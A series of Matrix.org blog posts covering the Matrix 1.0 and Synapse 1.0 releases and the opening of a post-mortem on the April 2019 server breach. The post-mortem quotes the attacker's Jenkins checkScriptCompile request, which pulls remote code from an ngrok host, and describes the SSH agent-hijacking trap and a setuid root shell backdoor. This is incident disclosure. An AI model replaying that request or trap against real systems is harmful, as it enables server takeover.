  4. Matrix needs to authenticate whether events were actually sent by the server that claimed to send them. We do this by having servers sign their events when they create them, and publishing the public half of their signing keys for anyone to query. However, this poses problems if you receive an event which is signed by a server which isn't currently online. To solve this, we have the concept of trusted_key_servers (aka notary servers), which your server can query to see if they know about the missing server's keys. By default, matrix.org is configured as Synapse's trusted notary, but you can of course change this. If you choose an unreliable server as the notary (e.g. by not setting one at all) then there's a risk that you won't be able to look up signing keys, and a splitbrain will result where your server can't receive certain events, but other servers in the room can. This can then result in your server being unable to participate in the room entirely, if it's missing key events in the room's lifetime.

    Our plan here is to get rid of notaries entirely by changing how event signing works as per MSC1228, but this is going to take a while. Meanwhile we're going to check Synapse's code to ensure it doesn't talk to the notary server unnecessarily. (E.g. it should be caching the signing keys locally, and it should only use the notary server if the remote server is down.)

  5. When doing VoIP in Matrix, clients need to use a TURN server to discover their network conditions and perform firewall traversal. The TURN server should be specified by your homeserver (and each homeserver deployment should ideally include a TURN server). However, for users who have not configured a TURN server, Riot (on all 3 platforms) defaulted to using Google's public STUN service (stun.l.google.com). STUN is a subset of TURN which provides firewall discovery, but not traffic relaying. This slightly increased the chances of calls working for users without a proper TURN server, but not by much - and rather than fall back to Google, we've decided to simply remove it from Riot (e.g. https://github.com/matrix-org/matrix-ios-sdk/commit/24832a2b14fb72ae6f051d5aba40262d11eef65d). This means that VoIP might get less reliable for users who were relying on this fallback, but you really should be running your own TURN server anyway if you want VoIP to work reliably on your homeserver.

  6. We should make it clearer in Riot that device names are world-readable, and not just for the user's own personal reference. This is https://github.com/vector-im/riot-web/issues/10216
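
Coming back to point 2 above, the gist of the MSC2134 change is easy to sketch: rather than sending raw email addresses or phone numbers to the identity server, the client sends a peppered hash of them. The snippet below is illustrative only - the exact wire format (endpoints, field names, the "address medium pepper" ordering) should be taken from MSC2134 itself:

# Illustrative sketch of the hashing step proposed in MSC2134. In the real flow
# the pepper is fetched from the identity server; here it is hard-coded.
import base64
import hashlib

def hash_3pid(address: str, medium: str, pepper: str) -> str:
    digest = hashlib.sha256(f"{address} {medium} {pepper}".encode()).digest()
    # Unpadded URL-safe base64, as used elsewhere in Matrix
    return base64.urlsafe_b64encode(digest).rstrip(b"=").decode()

print(hash_3pid("[email protected]", "email", "some_server_provided_pepper"))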

As you can see, much of the work on improving these issues is still in full swing, although some has already shipped. As should also be obvious, these issues are categorically not malicious: Matrix (and Riot) literally exists to give users full control and autonomy over their communication, and privacy is a key part of that. These are avoidable issues which can and will be solved. It's worth noting that we have to prioritise privacy issues alongside all the other development in Matrix however: there's no point in having excellent privacy if there are other bugs stopping the platform from being usable.

We'll do another blog post to confirm once most of the fixes here have landed - meanwhile, hopefully this post provides some useful visibility on how we're going about improving things.

Introducing Matrix 1.0 and the Matrix.org Foundation

11.06.2019 00:00 — General Matthew Hodgson

🔗Matrix 1.0

Hi all,

We are very excited to announce the first fully stable release of the Matrix protocol and specification across all APIs - as well as the Synapse 1.0 reference implementation which implements the full Matrix 1.0 API surface.

This means that after just over 5 years since the initial work on Matrix began, we are proud to have finally exited beta!! This is the conclusion of the work which we announced at FOSDEM 2019 when we cut the first stable release of the Server-Server API and began the Synapse 0.99 release series in anticipation of releasing a 1.0.

Now, before you get too excited, it’s critical to understand that Matrix 1.0 is all about providing a stable, self-consistent, self-contained and secure version of the standard which anyone should be able to use to independently implement production-grade Matrix clients, servers, bots and bridges etc. It does not mean that all planned or possible features in Matrix are now specified and implemented, but that the most important core of the protocol is a well-defined stable platform for everyone to build on.

On the Synapse side, our focus has been exclusively on ensuring that Synapse correctly implements Matrix 1.0, to provide a stable and secure basis for participating in Matrix without risk of room corruption or other nastinesses. However, we have deliberately not focused on performance or features in the 1.0 release - so I’m afraid that Synapse’s RAM footprint will not have got significantly better, and your favourite long-awaited features (automatically defragmenting rooms with lots of forward extremities, configurable message retention, admin management web-interface etc) have not yet landed. In other words, this is the opposite of the Riot 1.0 release (where the entire app was redesigned, radically improving its performance and UX) - instead, we have adopted the mantra to make it work, make it work right, and then (finally) make it fast. You can read the full release notes here. It’s also worth looking at the full changelog through the Synapse 0.99 release series to see the massive amount of polishing that’s been going on here.

All this means that the main headline features which land in Matrix 1.0 are vitally important but relatively dry:

  • Using X.509 certificates to trust servers rather than perspective notaries, to simplify and improve server-side trust. This is a breaking change across Matrix, and we’ve given the community several months now to ensure their homeservers run a valid TLS certificate. See MSC1711 for full details, and the 2 week warning we gave. As of ~9am UTC today, the matrix.org homeserver is running Synapse 1.0 and enforcing valid TLS certificates - the transition has begun (and so far we haven’t spotted any major breakage :). Thank you to everyone who got ready in advance!
  • Using .well-known URIs to discover servers, in case you can’t get a valid TLS certificate for your server’s domain.
  • Switching to room version 4 by default for creating new rooms. This fixes the most important defects that the core room algorithm has historically encountered - most notably the dreaded state resets, which the new state resolution algorithm addresses.
  • Specifying the ability to upgrade between room versions (there’s a small sketch of the upgrade API after this list)
  • Full specification of lazy loading room members
  • Short Authentication String (Emoji!) interactive verification of E2EE devices
  • ...and lots and lots and lots of bugfixes and spec omission fixes.
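
As referenced in the list above, room upgrades are driven by a dedicated client-server endpoint. Here’s a small sketch (using Python’s requests; the homeserver URL, room ID and access token are placeholders) of what an upgrade call looks like:

# Sketch of upgrading an existing room to room version 4 via the client-server
# API. The server creates a replacement room and links the two with a tombstone.
import requests
from urllib.parse import quote

homeserver = "https://example.org"     # placeholder
room_id = "!oldroom:example.org"       # placeholder
access_token = "YOUR_ACCESS_TOKEN"     # placeholder

resp = requests.post(
    f"{homeserver}/_matrix/client/r0/rooms/{quote(room_id)}/upgrade",
    params={"access_token": access_token},
    json={"new_version": "4"},
    timeout=10,
)
print(resp.json())  # on success: {"replacement_room": "!<new room id>:example.org"}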

That said, there is a lot of really exciting stuff in flight right now which sadly didn’t stabilise in time for Matrix 1.0, but will be landing as fast as we can finalise it now that 1.0 is at last out the door. This includes:

  • Editable messages! (These are in Synapse 1.0 and Riot already, but still stabilising so not enabled by default)
  • Reactions! (Similarly these are in develop)
  • Threading!! (We’ve planted the seeds for this in the new ‘aggregations’ support which powers edits & reactions - but full thread support is still a bit further out).
  • Cross-signed verification for end-to-end encryption (This is on a branch, but due to land any day now). We’ve also held off merging E2E backups into the Matrix 1.0 spec until cross-signing lands, given it may change the backup behaviour a bit. Once this is done, we can seriously talk about turning on E2E by default everywhere.
  • Live-tracking of room statistics and state in Synapse! (This is in Synapse 1.0 already if you check out the new room_stats and room_state tables, but we need to provide a nice admin interface for it).
  • Support for smaller footprint homeservers by reducing memory usage and stopping them from joining overly complex rooms.

Then stuff which we haven’t yet started, but is now unlocked by the 1.0 release:

  • Fixing extremities build-up (and so massively improving performance)
  • Rewriting Communities. Groups/Communities deliberately didn’t land in Matrix 1.0 as the current implementation has issues we want to fix first. MSC1772 has the details.
  • Rewritten room directory using the new room stats/state tables to be super-speedy.
  • Super-speedy incremental state resolution
  • Removing MXIDs from events (MSC1228)

Just to give a quick taster of the shape of things to come, here’s RiotX/Android, the all-new Riot client for Android, showing off Edits & Reactions in the wild…

...and here’s a screenshot of the final test jig for cross-signing devices in end-to-end encryption, so you will never have to manually verify new devices for a trusted user ever again! We demoed a very early version of this at FOSDEM, but this here is the testing harness for the real deal, after several iterations of the spec and implementation to nail down the model. + means the device/user's cross-signing key is trusted, T means it's TOFU:

So, there you have it - welcome to Matrix 1.0, and we look forward to our backlog of feature work now landing!

Massive massive thanks to everyone who has stuck with the project over the years and helped support and grow Matrix - little did we think back in May 2014 that it’d take us this long to exit beta, but hopefully you’ll agree that it’s been worth it :)

Talking of which, we were looking through the photos we took from the first ever session hacking on Matrix back in May 2014…

Whiteboard 1

...suffice it to say that of the architectural options, we went with #3 in the end...

Whiteboard 2

...and that nowadays we actually know how power levels work, in excruciating and (hopefully) well-specified detail :)

There has been an absolutely enormous amount of work to pull Matrix 1.0 together - both on the spec side (thanks to the Spec Core Team for corralling proposals, and everyone who's contributed proposals, and particularly to Travis for editing it all) and the implementation side (thanks to the whole Synapse team for the tedious task of cleaning up everything that was needed for 1.0). And of course, huge thanks go to everyone who has been helping test and debug the Synapse 1.0 release candidates, or just supporting the project to get to this point :)

🔗The Matrix.org Foundation

Finally, as promised, alongside Matrix 1.0, we are very happy to announce the official launch of the finalised Matrix.org Foundation!

This has been a long-running project to ensure that Matrix’s future is governed by a neutral non-profit custodian for the benefit of everyone in the Matrix ecosystem. We started the process nearly a year ago back with the initial proposal Towards Open Governance of Matrix.org, and then legally incorporated the Foundation in October, and published the final governance proposal in January.

As of today the Foundation is finalised and operational, and all the assets for Matrix.org have been transferred from New Vector (the startup we formed in 2017 to hire the core Matrix team). In fact you may already have seen Matrix.org Foundation notices popping up all over the Matrix codebase (as all of New Vector’s work on the public Matrix codebase for the foreseeable future is being assigned to the Matrix.org Foundation).

Most importantly, we’re excited to introduce the Guardians of the Matrix.org Foundation. The Guardians are the legal directors of the non-profit Foundation, and are responsible for ensuring that the Foundation (and by extension the Spec Core Team) keeps on mission and neutrally protects the development of Matrix. Guardians are typically independent of the commercial Matrix ecosystem and may even not be members of today’s Matrix community, but are deeply aligned with the mission of the project. Guardians are selected to be respected and trusted by the wider community to uphold the guiding principles of the Foundation and keep the other Guardians honest.

We have started the Foundation with five Guardians - two being the original founders of the Matrix project (Matthew and Amandine) and three being entirely independent, thus ensuring the original Matrix team forms a minority which can be kept in check by the rest of the Guardians. The new Guardians are:

  • Prof. Jon Crowcroft - Marconi Professor of Communications Systems in the Computer Lab at the University of Cambridge and the Turing Institute. Jon is a pioneer in the field of decentralised communication, and a fellow of the Royal Society, the ACM, the British Computer Society, the Institution of Engineering and Technology, the Royal Academy of Engineering and the Institute of Electrical and Electronics Engineers.

    Jon is a global expert in decentralisation and data privacy, and is excellently placed to help ensure Matrix stays true to its ideals.

  • Ross Schulman - Ross is a senior counsel and senior policy technologist at New America’s Open Technology Institute, where he focuses on internet measurement, emerging technologies, surveillance, and decentralization. Prior to joining OTI, Ross worked for Google.

    Ross brings a unique perspective as a tech- and decentralisation-savvy lawyer to the Foundation, as well as being one of the first non-developers in the Matrix community to run his own homeserver. Ross has been known to walk around Mozfest clutching a battery-powered Synapse in a box, promoting decentralised communication for all.

  • Dr. Jutta Steiner - As co-founder and CEO of Parity Technologies, Jutta is dedicated to building a better internet - Web 3.0 - where users’ privacy & control come first. Parity Technologies is a leader in the blockchain space – known to many as the creator of one of the most popular Ethereum clients, it is also the creator of two ambitious new blockchain technologies, Polkadot and Substrate, that make it easier to experiment and innovate on scalability, encryption and governance.

    Parity has been pioneering Matrix enterprise use since the moment they decided to rely on Matrix for their internal and external communication back in 2016, and now run their own high-volume deployment, with end-to-end encryption enabled by default. Jutta represents organisations who are professionally dependent on Matrix day-to-day, as well as bringing her unique experiences around decentralisation and ensuring that Web 3.0 will be a fair web for all.

We’d like to offer a very warm welcome to the new Guardians, and thank them profusely for giving up their time to join the Foundation and help ensure Matrix stays on course for the years to come.

For the full update on the Foundation, please check out the new website content at https://matrix.org/foundation which should tell you everything you could possibly want to know about the Foundation, the Guardians, the Foundation’s legal Articles of Association, and the day-to-day Rules which define the Open Governance process.

🔗And finally…

Matrix 1.0 has been a bit of an epic to release, but puts us on a much stronger footing for the future.

However, it’s very unlikely that we’d have made it this far if most of the core dev team wasn’t able to work on Matrix as their day job. Right now we are actively looking for large-scale donations to the Matrix.org Foundation (and/or investment in New Vector) to ensure that the team can maintain as tight a focus on core Matrix work as possible, and to ensure the project realises its full potential. While Matrix is growing faster than ever, this perversely means we have more and more distractions - whether that’s keeping the Matrix.org server safe and operational, or handling support requests from the community, or helping new members of the ecosystem get up and running. If you would like Matrix to succeed, please get in touch if you’d like to sponsor work, prioritise features, get support contracts, or otherwise support the project. We’re particularly interested in sponsorship around decentralised reputation work (e.g. publishing a global room directory which users can filter based on their preferences).

Finally, huge thanks to everyone who has continued to support us through thick and thin on Patreon, Liberapay or other platforms. Every little helps here, both in terms of practically keeping the lights on, and also inspiring larger donations & financial support.

So: thank you once again for flying Matrix. We hope you enjoy 1.0, and we look forward to everything else landing on the horizon!

- Matthew, Amandine & the whole Matrix.org Team.

Synapse 1.0.0 released

11.06.2019 00:00 — General Neil Johnson

Well here it is: Synapse 1.0.

Synapse 1.0 is the reference implementation of the Matrix 1.0 spec. The goal of the release overall has been to focus on security and stability, such that we can officially declare Synapse (and Matrix) out of beta and recommended for production use. This means changing the default room protocol version used for new rooms to v4, which includes the new state resolution algorithm, as well as collision-resistant event IDs, which are now formatted to be URL safe.
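
To illustrate the event ID change concretely: in room version 4 an event’s ID is no longer an arbitrary "$something:server" string chosen by the origin server, but "$" followed by the URL-safe base64 of the event’s SHA-256 reference hash. The sketch below is illustrative only - the real calculation hashes a canonical-JSON, redacted copy of the event rather than the stand-in bytes used here:

# Illustrative only: shape of a room-v4 event ID. The real reference hash is a
# sha256 over the canonical-JSON, redacted form of the event.
import base64
import hashlib

fake_reference_hash = hashlib.sha256(b"<canonical redacted event JSON>").digest()
event_id = "$" + base64.urlsafe_b64encode(fake_reference_hash).rstrip(b"=").decode()
print(event_id)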

Synapse 1.0 also ships with support for the upcoming v5 room protocol (which enforces honouring server key validity periods), but this will not be used as the default for new rooms until a sufficient number of servers support it.

Please note that Synapse 1.0 does not include significant performance work or new features - our focus has been almost exclusively on providing a reference implementation of the Matrix 1.0 protocol. But having cleared our backlog of security/stability issues, we will now finally be unblocked to pursue work around reducing RAM footprint, eliminating forward-extremity build up, and shipping new features like Edits, Reactions & E2E cross-signing support.

As part of the security work, Synapse 1.0 contains a breaking change that requires a valid TLS certificate on the federation API endpoint. Servers that do not configure their certificate will no longer be able to federate post 1.0.
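
If you want to sanity-check a server's federation certificate yourself, a minimal sketch along the following lines may help - this is just an illustration (not an official tool), and it assumes the default federation port 8448 with no .well-known or SRV delegation:

# Minimal sketch: check whether a homeserver's federation endpoint presents
# a TLS certificate that a standard trust store will accept. Assumes the
# default federation port 8448 and no .well-known/SRV delegation.
import socket
import ssl

def federation_cert_ok(server_name: str, port: int = 8448) -> bool:
    context = ssl.create_default_context()  # verifies the chain and hostname
    try:
        with socket.create_connection((server_name, port), timeout=10) as sock:
            with context.wrap_socket(sock, server_hostname=server_name):
                return True
    except (ssl.SSLError, OSError):
        return False

if __name__ == "__main__":
    print(federation_cert_ok("example.org"))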

It is also worth noting that Synapse 1.0.0 is the last release that will support Python 2.x and Postgres 9.4. For more information see here, but the TL;DR is that you should upgrade asap.

This release has been a long time coming. Many thanks indeed to everyone who helped test the release candidates and provided feedback along the way.

Synapse 1.0 is just one component of a larger Matrix 1.0 release, which you can read all about here.

As ever, you can get the new update here or from any of the sources mentioned at https://github.com/matrix-org/synapse. Note that Synapse is now available from PyPI - pick it up here. Also, check out our Synapse installation guide page.

The changelog since 0.99.5 follows:

🔗Synapse 1.0.0 (2019-06-11)

🔗Bugfixes

  • Fix bug where attempting to send transactions with a large number of EDUs could fail. (#5418)

🔗Improved Documentation

  • Expand the federation guide to include relevant content from the MSC1711 FAQ (#5419)

🔗Internal Changes

  • Move password reset links to /_matrix/client/unstable namespace. (#5424)

🔗Synapse 1.0.0rc3 (2019-06-10)

Security: Fix authentication bug introduced in 1.0.0rc1. Please upgrade to rc3 immediately

🔗Synapse 1.0.0rc2 (2019-06-10)

🔗Bugfixes

  • Remove redundant warning about key server response validation. (#5392)
  • Fix bug where old keys stored in the database with a null valid until timestamp caused all verification requests for that key to fail. (#5415)
  • Fix excessive memory usage with the default federation_verify_certificates: true configuration. (#5417)

🔗Synapse 1.0.0rc1 (2019-06-07)

🔗Features

  • Synapse now more efficiently collates room statistics. (#4338, #5260, #5324)
  • Add experimental support for relations (aka reactions and edits). (#5220)
  • Ability to configure default room version. (#5223, #5249)
  • Allow configuring a range for the account validity startup job. (#5276)
  • CAS login will now hit the r0 API, not the deprecated v1 one. (#5286)
  • Validate federation server TLS certificates by default (implements MSC1711). (#5359)
  • Update /_matrix/client/versions to reference support for r0.5.0. (#5360)
  • Add a script to generate new signing-key files. (#5361)
  • Update upgrade and installation guides ahead of 1.0. (#5371)
  • Replace the perspectives configuration section with trusted_key_servers, and make validating the signatures on responses optional (since TLS will do this job for us). (#5374)
  • Add ability to perform password reset via email without trusting the identity server. (#5377)
  • Set default room version to v4. (#5379)

🔗Bugfixes

  • Fixes client-server API not sending "m.heroes" to lazy-load /sync requests when a room's name or its canonical alias is empty. Thanks to @dnaf for this work! (#5089)
  • Prevent federation device list updates breaking when processing multiple updates at once. (#5156)
  • Fix worker registration bug caused by ClientReaderSlavedStore being unable to see get_profileinfo. (#5200)
  • Fix race when backfilling in rooms with worker mode. (#5221)
  • Fix appservice timestamp massaging. (#5233)
  • Ensure that server_keys fetched via a notary server are correctly signed. (#5251)
  • Show the correct error when logging out and access token is missing. (#5256)
  • Fix error code when there is an invalid parameter on /_matrix/client/r0/publicRooms (#5257)
  • Fix error when downloading thumbnail with missing width/height parameter. (#5258)
  • Fix schema update for account validity. (#5268)
  • Fix bug where we leaked extremities when we soft failed events, leading to performance degradation. (#5274, #5278, #5291)
  • Fix "db txn 'update_presence' from sentinel context" log messages. (#5275)
  • Fix dropped logcontexts during high outbound traffic. (#5277)
  • Fix a bug where it is not possible to get events in the federation format with the request GET /_matrix/client/r0/rooms/{roomId}/messages. (#5293)
  • Fix performance problems with the rooms stats background update. (#5294)
  • Fix noisy 'no key for server' logs. (#5300)
  • Fix bug where a notary server would sometimes forget old keys. (#5307)
  • Prevent users from setting huge displaynames and avatar URLs. (#5309)
  • Fix handling of failures when processing incoming events where calling /event_auth on remote server fails. (#5317)
  • Ensure that we have an up-to-date copy of the signing key when validating incoming federation requests. (#5321)
  • Fix various problems which made the signing-key notary server time out for some requests. (#5333)
  • Fix bug which would make certain operations (such as room joins) block for 20 minutes while attempting to fetch verification keys. (#5334)
  • Fix a bug where we could rapidly mark a server as unreachable even though it was only down for a few minutes. (#5335, #5340)
  • Fix a bug where account validity renewal emails could only be sent when email notifs were enabled. (#5341)
  • Fix failure when fetching batches of events during backfill, etc. (#5342)
  • Add a new room version where the timestamps on events are checked against the validity periods on signing keys. (#5348, #5354)
  • Fix room stats and presence background updates to correctly handle missing events. (#5352)
  • Include left members in room summaries' heroes. (#5355)
  • Fix federation_custom_ca_list configuration option. (#5362)
  • Fix missing logcontext warnings on shutdown. (#5369)

🔗Improved Documentation

  • Fix docs on resetting the user directory. (#5282)
  • Fix notes about ACME in the MSC1711 faq. (#5357)

🔗Internal Changes

  • Synapse will now serve the experimental "room complexity" API endpoint. (#5216)
  • The base classes for the v1 and v2_alpha REST APIs have been unified. (#5226, #5328)
  • Simplifications and comments in do_auth. (#5227)
  • Remove urllib3 pin as requests 2.22.0 has been released supporting urllib3 1.25.2. (#5230)
  • Preparatory work for key-validity features. (#5232, #5234, #5235, #5236, #5237, #5244, #5250, #5296, #5299, #5343, #5347, #5356)
  • Specify the type of reCAPTCHA key to use. (#5283)
  • Improve sample config for monthly active user blocking. (#5284)
  • Remove spurious debug from MatrixFederationHttpClient.get_json. (#5287)
  • Improve logging for logcontext leaks. (#5288)
  • Clarify that the admin change password API logs the user out. (#5303)
  • New installs will now use the v54 full schema, rather than the full schema v14 and applying incremental updates to v54. (#5320)
  • Improve docstrings on MatrixFederationClient. (#5332)
  • Clean up FederationClient.get_events for clarity. (#5344)
  • Various improvements to debug logging. (#5353)
  • Don't run CI build checks until sample config check has passed. (#5370)
  • Automatically retry buildkite builds (max twice) when an agent is lost. (#5380)

Final countdown to 1.0

24.05.2019 00:00 — General Matthew Hodgson

Hi all,

After lots of refinements, polishing and a few distractions we’re finally at the point of announcing the final timeline for both Matrix 1.0 and Synapse 1.0! We are targeting Monday 10th June as our release date - please consider this your two week warning!

This is the end game of the process we began back in February when we released the first stable release of the Server-Server API at FOSDEM, and started the Synapse 0.99 release series to prepare for 1.0.

Matrix 1.0 refers to the upcoming set of API releases which provides a matched set of stable and secure APIs across all of Matrix - at which point the project (at last) exits beta! In practice, this will be Client-Server API 0.5 (including final membership lazy loading, E2E backups and interactive verification and lots more), SS API 0.2 (including server key validity period fixes and associated v5 room protocol) and any other spec updates. The next 2 weeks will see a flurry of spec activity as we get everything together - you can see the full list and track the progress for the CS 0.5 spec release at https://github.com/matrix-org/matrix-doc/projects/2.

Meanwhile, Synapse 1.0 will be the reference implementation of Matrix 1.0, and so makes the changes required to implement Matrix 1.0 and close all currently known security and stability issues, thus exiting beta. This means changing the default room protocol version used for new rooms to be v4, which includes the new state resolution algorithm, as well as collision-resistant event IDs, which are now formatted to be URL safe. Support for v4 rooms shipped in Synapse 0.99.5.1, so please upgrade to 0.99.5.1 asap to ease the transition before 1.0 is released. Synapse 1.0 will also ship with support for the upcoming v5 room protocol (which enforces honouring server key validity periods), but this will not be used as the default for new rooms until sufficient servers are speaking Matrix 1.0.

As part of the security work, Matrix 1.0 and Synapse 1.0 also contain a breaking change that requires a valid TLS certificate on the federation API endpoint. Servers that do not configure their certificate will no longer be able to federate post 1.0.

You can check that your server has been correctly configured here and see here for more info on what you need to do. If in doubt head to #synapse:matrix.org.

We've been tracking readiness for the certificate change at https://arewereadyyet.com; at the time of writing, 68% of active servers on the federation have valid certificates. We would obviously like that number to be higher, but since the largest installations have already upgraded, the total number of users ready for 1.0 stands at 96%, which we consider high enough to release.

This is not a drill: from here until 10th June we need everyone not only to ensure that their own server is ready, but also to encourage their fellow admins to update as well. With your help we can get everyone over the line!

Thanks everyone for your help to date, especially those providing support in #synapse:matrix.org.

Onwards!

Post-mortem and remediations for Apr 11 security incident

08.05.2019 00:00 — General Matthew Hodgson

🔗Introduction

Hi all,

On April 11th we dealt with a major security incident impacting the infrastructure which runs the Matrix.org homeserver - specifically: removing an attacker who had gained superuser access to much of our production network. We provided updates at the time as events unfolded on April 11 and 12 via Twitter and our blog, but in this post we’ll try to give a full analysis of what happened and, critically, what we have done to avoid this happening again in future. Apologies that this has taken several weeks to put together: the time-consuming process of rebuilding after the breach has had to take priority, and we also wanted to get the key remediation work in place before writing up the post-mortem.

Firstly, please understand that this incident was not due to issues in the Matrix protocol itself or the wider Matrix network - and indeed everyone who wasn’t on the Matrix.org server should have barely noticed. If you see someone say “Matrix got hacked”, please politely but firmly explain to them that the servers which run the oldest and biggest instance got compromised via a Jenkins vulnerability and bad ops practices, but the protocol and network themselves were not impacted. This is not to say that the Matrix protocol itself is bug free - indeed we are still in the process of exiting beta (delayed by this incident) - but this incident was not related to the protocol.

Before we get stuck in, we would like to apologise unreservedly to everyone impacted by this whole incident. Matrix is an altruistic open source project, and our mission is to try to make the world a better place by providing a secure decentralised communication protocol and network for the benefit of everyone; giving users total control back over how they communicate online.

In this instance, our focus on trying to improve the protocol and network came at the expense of investing sysadmin time around the legacy Matrix.org homeserver and project infrastructure which we provide as a free public service to help bootstrap the Matrix ecosystem, and we paid the price.

This post will hopefully illustrate that we have learnt our lessons from this incident and will not be repeating them - and indeed intend to come out of this episode stronger than you can possibly imagine :)

Meanwhile, if you think that the world needs Matrix, please consider supporting us via Patreon or Liberapay. Not only will this make it easier for us to invest in our infrastructure in future, it also makes projects like Pantalaimon (E2EE compatibility for all Matrix clients/bots) possible, which are effectively being financed entirely by donations. The funding we raised in Jan 2018 is not going to last forever, and we are currently looking into new longer-term funding approaches - for which we need your support.

Finally, if you happen across security issues in Matrix or matrix.org’s infrastructure, please please consider disclosing them responsibly to us as per our Security Disclosure Policy, in order to help us improve our security while protecting our users.

🔗History

Firstly, some context about Matrix.org’s infrastructure. The public Matrix.org homeserver and its associated services runs across roughly 30 hosts, spanning the actual homeserver, its DBs, load balancers, intranet services, website, bridges, bots, integrations, video conferencing, CI, etc. We provide it as a free public service to the Matrix ecosystem to help bootstrap the network and make life easier for first-time users.

The deployment which was compromised in this incident was mainly set up back in Aug 2017 when we vacated our previous datacenter at short notice, thanks to our funding situation at the time. Previously we had been piggybacking on the well-managed production datacenters of our previous employer, but during the exodus we needed to move as rapidly as possible, and so we spun up a bunch of vanilla Debian boxes on UpCloud and shifted over services as simply as we could. We had no dedicated ops people on the project at that point, so this was a subset of the Synapse and Riot/Web dev teams putting on ops hats to rapidly get set up, whilst also juggling the daily fun of keeping the ever-growing Matrix.org server running and trying to actually develop and improve Matrix itself.

In practice, this meant that some corners were cut that we expected to be able to come back to and address once we had dedicated ops staff on the team. For instance, we skipped setting up a VPN for accessing production in favour of simply SSHing into the servers over the internet. We also went for the simplest possible config management system: checking all the configs for the services into a private git repo. We also didn’t spend much time hardening the default Debian installations - for instance, the default image allows root access via SSH and SSH agent forwarding, and we never tweaked that config. This is particularly unfortunate, given our previous production OS (a customised Debian variant) had got all these things right - but the attitude was that because we’d got this right in the past, we’d easily be able to get it right again in future once we fixed up the hosts with proper configuration management etc.

Separately, we also made the controversial decision to maintain a public-facing Jenkins instance. We did this deliberately, despite the risks associated with running a complicated publicly available service like Jenkins, but reasoned that as a FOSS project, it is imperative that we are transparent and that continuous integration results and artefacts are available and directly visible to all contributors - whether they are part of the core dev team or not. So we put Jenkins on its own host, gave it some macOS build slaves, and resolved to keep an eye open for any security alerts which would require an upgrade.

Lots of stuff then happened over the following months - we secured funding in Jan 2018; the French Government began talking about switching to Matrix around the same time; the pressure of getting Matrix (and Synapse and Riot) out of beta and to a stable 1.0 grew ever stronger; the challenge of handling the ever-increasing traffic on the Matrix.org server soaked up more and more time, and we started to see our first major security incidents (a major DDoS in March 2018, mitigated by shielding behind Cloudflare, and various attacks on the more beta bits of Matrix itself).

The good news was that this funding meant that in March 2018 we were able to hire a full-time ops specialist! By this point, however, we had two new critical projects in play to try to ensure long-term funding for the project via New Vector, the startup formed in 2017 to hire the core team. Firstly, to build out Modular.im as a commercial-grade Matrix SaaS provider, and secondly, to support France in rolling out their massive Matrix deployment as a flagship example of how Matrix can be used. And so, for better or worse, the brand new ops team was given a very clear mandate: to largely ignore the legacy datacenter infrastructure, and instead focus exclusively on building entirely new, pro-grade infrastructure for Modular.im and France, with the expectation of eventually migrating Matrix.org itself into Modular when ready (or just turning off the Matrix.org server entirely, once we have account portability).

So we ended up with two production environments; the legacy Matrix.org infra, whose shortcomings continued to linger and fester off the radar, and separately all the new Modular.im hosts, which are almost entirely operationally isolated from the legacy datacenter; whose configuration is managed exclusively by Ansible, and have sensible SSH configs which disallow root login etc. With 20:20 hindsight, the failure to prioritise hardening the legacy infrastructure is quite a good example of the normalisation of deviance - we had gotten too used to the bad practices; all our attention was going elsewhere; and so we simply failed to prioritise getting back to fix them.

🔗The Incident

The first evidence of things going wrong came from JaikeySarraf, a security researcher who kindly reached out via DM at the end of Apr 9th to warn us that our Jenkins was outdated after stumbling across it via Google. In practice, our Jenkins was running version 2.117 with plugins which had been updated on an ad hoc basis, and we had indeed missed the security advisory (partially because most of our CI pipelines had moved to TravisCI, CircleCI and Buildkite), and so on Apr 10th we updated the Jenkins and investigated to see if any vulnerabilities had been exploited.

In this process, we spotted an unrecognised SSH key in /root/.ssh/authorized_keys2 on the Jenkins build server. This was suspicious both due to the key not being in our key DB and the fact the key was stored in the obscure authorized_keys2 file (a legacy location from back when OpenSSH transitioned from SSH1->SSH2). Further inspection showed that 19 hosts in total had the same key present in the same place.

At this point we started doing forensics to understand the scope of the attack and plan the response, as well as taking snapshots of the hosts to protect data in case the attacker realised we were aware and attempted to vandalise or cover their tracks. Findings were:

  • The attacker exploited our unpatched Jenkins on March 13th via a request to its checkScriptCompile endpoint, as captured in this access-log entry:
matrix.org:443 151.34.xxx.xxx - - [13/Mar/2019:18:46:07 +0000] "GET /jenkins/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0A@GrabResolver(name=%27orange.tw%27,%20root=%27http://5f36xxxx.ngrok.io/jenkins/%27)%0A@Grab(group=%27tw.orange%27,%20module=%270x3a%27,%20version=%27000%27)%0Aimport%20Orange; HTTP/1.1" 500 6083 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"

  • This allowed them to further compromise a Jenkins slave (Flywheel, an old Mac Pro used mainly for continuous integration testing of Riot/iOS and Riot/Android). The attacker put an SSH key on the box, which was unfortunately exposed to the internet via a high-numbered SSH port for ease of admin by remote users, and placed a trap which waited for any user to SSH into the jenkins user, which would then hijack any available forwarded SSH keys to try to add the attacker’s SSH key to root@ on as many other hosts as possible.
  • On Apr 4th at 12:32 GMT, one of the Riot devops team members SSH’d into the Jenkins slave to perform some admin, forwarding their SSH key for convenience for accessing other boxes while doing so. This triggered the trap, and resulted in the majority of the malicious keys being inserted to the remote hosts.
  • From this point on, the attacker proceeded to explore the network, performing targeted exfiltration of data (e.g. our passbolt database, which is thankfully end-to-end encrypted via GPG) seemingly targeting credentials and data for use in onward exploits, and installing backdoors for later use (e.g. a setuid root shell at /usr/share/bsd-mail/shroot).
  • The majority of access to the hosts occurred between Apr 4th and 6th.
  • There was no evidence of large-scale data exfiltration, based on analysing network logs.
  • There was no evidence of Modular.im hosts having been compromised. (Modular’s provisioning system and DB did run on the old infrastructure, but it was not used to tamper with the modular instances themselves).
  • There was no evidence of the identity server databases having been compromised.
  • There was no evidence of tampering in our source code repositories.
  • There was no evidence of tampering of our distributed software packages.
  • Two more hosts were compromised on Apr 5th by similarly hijacking another developer's SSH agent as the dev logged into a production server.

By around 2am on Apr 11th we felt that we had sufficient visibility on the attacker’s behaviour to be able to do a first pass at evicting them by locking down SSH, removing their keys, and blocking as much network traffic as we could.

